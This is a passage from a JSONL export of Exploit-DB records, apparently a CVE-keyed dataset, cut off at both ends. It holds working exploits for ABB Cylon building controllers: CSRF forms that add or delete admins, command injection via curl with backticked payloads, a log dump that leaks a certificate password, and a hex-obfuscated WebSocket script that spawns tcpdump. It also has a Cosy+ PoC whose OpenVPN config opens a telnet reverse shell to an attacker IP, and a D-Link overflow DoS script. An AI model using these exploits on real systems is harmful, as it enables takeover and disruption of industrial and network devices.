░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\nCookie: PHPSESSID=xxx; context1=xxx; globals={\"currentUser\":{\"username\":\"aamuser\",\"authdata\":\"YWFtdXNlcjpkZWZhdWx0\",\"mangledAuth\":\"bXVidmZnO2Vmc3Z0Ym45YjczMzY2ODo6MjQyODQ7Mg==\",\"loginExpirySeconds\":0},\"loggedIn\":true,\"lang\":\"en\"}; cod=5.27; connect.sid=xxx; csd=44", "cve_id": "CVE-2024-51546", "source": "exploitdb", "timestamp": "2025-04-15T00:00:00+00:00"} {"id": "3c686f620f67e6e732eb", "text": "ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)\n\n\n\n\n\n\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n\n// Add User/Admin\n \n
\n \n \n \n \n
\n \n\n\n// Add User/Admin\n \n
\n \n \n \n \n \n
\n \n\n\n// Delete User/Admin\n \n
\n \n \n \n \n \n
\n \n\n", "cve_id": "CVE-2024-48846", "source": "exploitdb", "timestamp": "2025-04-16T00:00:00+00:00"} {"id": "9981ef1488f676645919", "text": "ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)\n\n# Exploit Title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)\n# Vendor: ABB Ltd.\n# Product web page: https://www.global.abb\n# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)\n CBX Series (FLX Series)\n CBT Series\n CBV Series\n Firmware: <=9.3.4\n\nSummary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a\nseries of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™\nbuilding management solutions. ABB BACnet controllers are designed for intelligent\ncontrol of HVAC equipment such as central plant, boilers, chillers, cooling towers,\nheat pump systems, air handling units (constant volume, variable air volume, and\nmulti-zone), rooftop units, electrical systems such as lighting control, variable\nfrequency drives and metering.\n\nThe FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented\nconnectivity and open integration for your building automation systems. It's scalable,\nand modular, allowing you to control a diverse range of HVAC functions.\n\nDesc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote root\ncode execution via the /api/timeConfig endpoint. An attacker with valid credentials\ncan inject arbitrary system commands by manipulating parameters such as tz, timeServerYN,\nand multiple timeDate fields. The vulnerability exists due to improper input validation\nin timeConfig.js, where user-supplied data is executed via ChildProcess.exec() without\nadequate sanitization.\n\nTested on: Linux Kernel 5.4.27\n Linux Kernel 4.15.13\n NodeJS/8.4.0\n Express\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5910\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5910.php\nCVE ID: CVE-2024-48841\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n$ curl -k -X PUT \"https://7.3.3.1/api/timeConfig\" \\\n> -H \"Cookie: user_sid=xxx\" \\\n> -H \"Content-Type: application/json\" \\\n> -d '{\"timeConfig\":{\"timeDate\":{\\\n> \"yy\":\"`sleep 17`\",\\\n> \"mm\":\"`sleep 17`\",\\\n> \"dd\":\"`sleep 17`\",\\\n> \"h\":\"`sleep 17`\",\\\n> \"m\":\"`sleep 17`\",\\\n> \"s\":\"`sleep 17`\"},\\\n> \"tz\":\"`sleep 17`\",\\\n> \"tzList\":[],\\\n> \"timeServerYN\":\"`sleep 17`\",\\\n> \"timeServer\":\"1.1.1.1\",\\\n> \"timeServerSync\":false}}'", "cve_id": "CVE-2024-48841", "source": "exploitdb", "timestamp": "2025-04-11T00:00:00+00:00"} {"id": "ee45a024f68309a91fa7", "text": "ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)\n\n# Exploit title: ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)\n# Vendor: ABB Ltd.\n# Product web page: https://www.global.abb\n# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)\n CBX Series (FLX Series)\n CBT Series\n CBV Series\n Firmware: <=9.3.4\n\nSummary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a\nseries of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™\nbuilding management solutions. ABB BACnet controllers are designed for intelligent\ncontrol of HVAC equipment such as central plant, boilers, chillers, cooling towers,\nheat pump systems, air handling units (constant volume, variable air volume, and\nmulti-zone), rooftop units, electrical systems such as lighting control, variable\nfrequency drives and metering.\n\nThe FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented\nconnectivity and open integration for your building automation systems. It's scalable,\nand modular, allowing you to control a diverse range of HVAC functions.\n\nDesc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote\nroot code execution via the /api/users/password endpoint. An attacker with valid\ncredentials can inject arbitrary system commands by manipulating the newPassword PUT\nparameter. The issue arises in users.js, where the new password is hashed and improperly\nescaped before being passed to ChildProcess.exec() within a usermod command, allowing\nout of band (blind) command injection.\n\nTested on: Linux Kernel 5.4.27\n Linux Kernel 4.15.13\n NodeJS/8.4.0\n Express\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5912\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5912.php\nCVE ID: CVE-2024-48841\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n$ curl -k -X PUT \"https://7.3.3.1/api/users/password\" \\\n> -H \"Cookie: user_sid=xxx\" \\\n> -H \"Content-Type: application/json\" \\\n> --data '{\"oldPassword\":\"KAKA\",\"newPassword\":\"ZULU`sleep 7`\"}'", "cve_id": "CVE-2024-48841", "source": "exploitdb", "timestamp": "2025-04-11T00:00:00+00:00"} {"id": "62c006922cc87d9a30b6", "text": "ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure\n\n# Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure\n# Vendor: ABB Ltd.\n# Product web page: https://www.global.abb\n# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)\n CBX Series (FLX Series)\n CBT Series\n CBV Series\n Firmware: <=9.3.4\n\nSummary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a\nseries of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™\nbuilding management solutions. ABB BACnet controllers are designed for intelligent\ncontrol of HVAC equipment such as central plant, boilers, chillers, cooling towers,\nheat pump systems, air handling units (constant volume, variable air volume, and\nmulti-zone), rooftop units, electrical systems such as lighting control, variable\nfrequency drives and metering.\n\nThe FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented\nconnectivity and open integration for your building automation systems. It's scalable,\nand modular, allowing you to control a diverse range of HVAC functions.\n\nDesc: An authenticated attacker can access sensitive information via the system logs\npage of ABB Cylon FLXeon controllers. The logs expose critical data, including the\nOpenSSL password for stored certificates. This information can be leveraged for further\nattacks, such as decrypting encrypted communications, impersonation, or gaining deeper\nsystem access.\n\nTested on: Linux Kernel 5.4.27\n Linux Kernel 4.15.13\n NodeJS/8.4.0\n Express\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2025-5920\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php\nCVE ID: CVE-2024-48852\nCVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852\n\n\n21.04.2024\n\n--\n\n\n$ cat project\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\n\n$ curl -k \"https://7.3.3.1/api/cmds\" \\ # JS > /diagnostics/logs-system (platform-dist)\n> -H \"Cookie: user_sid=xxx\" \\\n> -d \"{\\\"cmd\\\":\\\"journalctl -b -r --no-hostname ^| head -c 600000 \\\"}\"\n\n-- Logs begin at Thu 2024-06-13 10:58:03 EDT, end at Mon 2024-09-09 09:10:33 EDT. --\nFeb 13 12:38:26 node[5810]: at endReadableNT (_stream_readable.js:1059:12)\nFeb 13 12:38:26 node[5810]: at IncomingMessage.emit (events.js:207:7)\nFeb 13 12:38:26 node[5810]: at emitNone (events.js:105:13)\nFeb 13 12:38:26 node[5810]: at IncomingMessage.onEnd (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:273:7)\nFeb 13 12:38:26 node[5810]: at done (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:213:7)\nFeb 13 12:38:26 node[5810]: at invokeCallback (/home/MIX_CMIX/node-serve\"}\n...\n...\nSep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj \"/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=\"\nSep 09 09:08:18 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj \"/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=\"\nSep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'\nSep 09 08:59:58 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem'\nSep 09 08:59:41 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/\n...\n...", "cve_id": "CVE-2024-48852", "source": "exploitdb", "timestamp": "2025-04-11T00:00:00+00:00"} {"id": "d6867e1bf57b60063452", "text": "ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning\n\n# ABB Cylon FLXeon 9.3.4 (wsConnect.js) WebSocket Command Spawning PoC\n# Vendor: ABB Ltd.\n# Product web page: https://www.global.abb\n# Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series)\n CBX Series (FLX Series)\n CBT Series\n CBV Series\n Firmware: <=9.3.4\n# Advisory ID: ZSL-2025-5913\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5913.php\n# CVE ID: CVE-2024-48849\n# CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48849\n\nSummary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a\nseries of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™\nbuilding management solutions. ABB BACnet controllers are designed for intelligent\ncontrol of HVAC equipment such as central plant, boilers, chillers, cooling towers,\nheat pump systems, air handling units (constant volume, variable air volume, and\nmulti-zone), rooftop units, electrical systems such as lighting control, variable\nfrequency drives and metering.\n\nThe FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented\nconnectivity and open integration for your building automation systems. It's scalable,\nand modular, allowing you to control a diverse range of HVAC functions.\n\nDesc: The ABB Cylon FLXeon BACnet controller is vulnerable to an unauthenticated\nWebSocket implementation that allows an attacker to execute the tcpdump command.\nThis command captures network traffic and filters it on serial ports 4855 and 4851,\nwhich are relevant to the device's services. The vulnerability can be exploited in\na loop to start multiple instances of tcpdump, leading to resource exhaustion, denial\nof service (DoS) conditions, and potential data exfiltration. The lack of authentication\non the WebSocket interface allows unauthorized users to continuously spawn new tcpdump\nprocesses, amplifying the attack's impact.\n\nTested on: Linux Kernel 5.4.27\n Linux Kernel 4.15.13\n NodeJS/8.4.0\n Express\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\n21.04.2024\n\nEOC\n\ncat << \"EOF\"\n\n P R O J E C T\n\n .|\n | |\n |'| ._____\n ___ | | |. |' .---\"|\n _ .-' '-. | | .--'| || | _| |\n .-'| _.| | || '-__ | | | || |\n |' | |. | || | | | | || |\n ____| '-' ' \"\" '-' '-.' '` |____\n░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░\n ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░\n ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░\n\nEOF\necho -ne \"\\n-------------------------------------------------------\"\necho -ne \"\\nABB Cylon BACnet Building Controllers WebSocket Exploit\"\necho -ne \"\\n-------------------------------------------------------\\n\"\nif [ \"$#\" -ne 1 ]; then\n\techo -ne \"\\nUsage: $0 [ipaddr]\\n\\n\"\n\texit\nfi\nIP=$1\nTARGET=\"wss://$IP:443/ws\"\nPID=$!\necho \"$PID\"\n\nSTOP_SERVICE=`echo -e \\\n\"\\x7B\\x22\\x74\\x61\\x72\\x67\\x65\\x74\\x22\\x3A\\x22\\x74\\x63\"\\\n\"\\x70\\x64\\x75\\x6D\\x70\\x22\\x2C\\x22\\x6D\\x65\\x74\\x68\\x6F\"\\\n\"\\x64\\x22\\x3A\\x22\\x73\\x74\\x6F\\x70\\x22\\x2C\\x22\\x70\\x61\"\\\n\"\\x72\\x61\\x6D\\x73\\x22\\x3A\\x7B\\x22\\x74\\x79\\x70\\x65\\x22\"\\\n\"\\x3A\\x22\\x73\\x6D\\x61\\x72\\x74\\x52\\x6F\\x75\\x74\\x65\\x72\"\\\n\"\\x22\\x2C\\x22\\x6D\\x69\\x6E\\x75\\x74\\x65\\x73\\x22\\x3A\\x31\"\\\n\"\\x2C\\x22\\x73\\x69\\x7A\\x65\\x4B\\x62\\x22\\x3A\\x31\\x30\\x7D\"\\\n\"\\x7D\"` #stop tcpdump smartRouter capture\n\nSTART_SERVICE=`echo -e \\\n\"\\x7B\\x22\\x74\\x61\\x72\\x67\\x65\\x74\\x22\\x3A\\x22\\x74\\x63\"\\\n\"\\x70\\x64\\x75\\x6D\\x70\\x22\\x2C\\x22\\x6D\\x65\\x74\\x68\\x6F\"\\\n\"\\x64\\x22\\x3A\\x22\\x73\\x74\\x61\\x72\\x74\\x22\\x2C\\x22\\x70\"\\\n\"\\x61\\x72\\x61\\x6D\\x73\\x22\\x3A\\x7B\\x22\\x74\\x79\\x70\\x65\"\\\n\"\\x22\\x3A\\x22\\x73\\x6D\\x61\\x72\\x74\\x52\\x6F\\x75\\x74\\x65\"\\\n\"\\x72\\x22\\x2C\\x22\\x6D\\x69\\x6E\\x75\\x74\\x65\\x73\\x22\\x3A\"\\\n\"\\x31\\x2C\\x22\\x73\\x69\\x7A\\x65\\x4B\\x62\\x22\\x3A\\x31\\x30\"\\\n\"\\x7D\\x7D\"` #start tcpdump smartRouter capture\n\necho -e \"\\n[+] Sending JSONRPC => $START_SERVICE\\n\"\nsleep 1\necho \"$START_SERVICE\"|\nwebsocat --insecure --one-message --buffer-size 251 --no-close \"$TARGET\" -v\nsleep 2\necho -e \"\\n[+] Sending JSONRPC => $STOP_SERVICE\\n\"\nsleep 1\necho \"$STOP_SERVICE\"|\nwebsocat -k -1 -B 251 -n \"$TARGET\" -v\necho -e \"\\n[*] Done\"\n\n<< \"LOG\"\n", "cve_id": "CVE-2024-48849", "source": "exploitdb", "timestamp": "2025-04-11T00:00:00+00:00"} {"id": "2a2e4825080151d68f22", "text": "Cosy+ firmware 21.2s7 - Command Injection\n\n# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection\n# Google Dork: N/A\n# Date: 2024-8-20\n# Exploit Author: CodeB0ss\n# Contact: t.me/codeb0ss / uncodeboss@gmail.com\n# Version: 21.2s7\n # Tested on: Windows 11 Home Edition\n # CVE: CVE-2024-33896\n\n\nimport socket\nimport subprocess\nimport time\n\ndef configcreator(file_path):\n with open(file_path, 'w') as f: f.write( \"\"\" client dev tun persist-tun\nproto tcp verb 5 mute 20 --up '/bin/sh -c \"TF=$(mktemp -u);mkfifo\n$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF\"' script-security 2 \"\"\") def\nl3st(port): server_socket = socket.socket(socket.AF_INET,\nsocket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))\nserver_socket.listen(1) print(f\" - --> Listening_0n_port {port}\")\nclient_socket, _ = server_socket.accept() print(\" - --> Recevied\") while\nTrue: data = client_socket.recv(1024) if not data: break\nprint(data.decode()) client_socket.close() server_socket.close() if name ==\n\"main\": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =\n5000 listener_process = subprocess.Popen(['python', '-c', f'from main\nimport start_listener; start_listener({port})']) time.sleep(2)\ncreate_malicious_openvpn_config(config) print(f\" - --> config_created\n{config}\")\n\n\nGitHub:\nhttps://github.com/codeb0ss/CVE-2024-33896-PoC\n\nHey,\n\nOverview: The Ewon Cosy+ is a VPN gateway used for remote access and\nmaintenance in industrial environments. The manufacturer describes the\nproduct as follows (see [1]): \"The Ewon Cosy+ gateway establishes a secure\nVPN connection between the machine (PLC, HMI, or other devices) and the\nremote engineer. The connection happens through Talk2m, a highly secured\nindustrial cloud service. The Ewon Cosy+ makes industrial remote access\neasy and secure like never before!\" Due to improper neutralization of\nparameters read from a user-controlled configuration file, an authenticated\nattacker is able to inject and execute OS commands on the device.\n\nVulnerability Details: Authenticated attackers are able to upload a custom\nOpenVPN configuration. This configuration can contain the OpenVPN\nparamaters \"--up\" and \"--down\", which execute a specified script or\nexecutable. Since the process itself runs with the highest privileges\n(root), this allows the device to be completely compromised.", "cve_id": "CVE-2024-33896", "source": "exploitdb", "timestamp": "2025-04-10T00:00:00+00:00"} {"id": "16dac9933fb0ff1442e7", "text": "D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)\n\n# Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)\n# Google Dork: N/A\n# Date: 2025-09-25\n# Exploit Author: Beatriz Fresno Naumova\n# Vendor Homepage: https://www.dlink.com/\n# Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp\n# Version: DIR-825 Rev.B <= 2.10\n# Tested on: DIR-825 Rev.B physical hardware, local network\n# CVE: CVE-2025-10666\n#\n# Description:\n# A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the\n# D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter.\n# This PoC sends an overly long POST parameter to crash the process.\n\nimport requests\n\nTARGET = \"http://192.168.0.1/apply.cgi\" # Change this to the router's IP\nLENGTH = 4000 # Adjust length for testing / fuzzing\nPAYLOAD = \"1\" * LENGTH\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Referer\": \"http://192.168.0.1/\",\n}\n\ndata = {\n \"countdown_time\": PAYLOAD\n}\n\ntry:\n print(f\"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}\")\n r = requests.post(TARGET, headers=headers, data=data, timeout=5)\n print(f\"[+] Status Code: {r.status_code}\")\n print(\"[+] Exploit sent. Check if the router crashes or becomes unresponsive.\")\nexcept Exception as e:\n print(f\"[-] Failed to send exploit: {e}\")", "cve_id": "CVE-2025-10666", "source": "exploitdb", "timestamp": "2026-02-02T00:00:00+00:00"} {"id": "65f3dc796dec9c3b8d9c", "text": "TOTOLINK N300RB 8.54 - Command Execution\n\n# Title: TOTOLINK N300RB 8.54 - Command 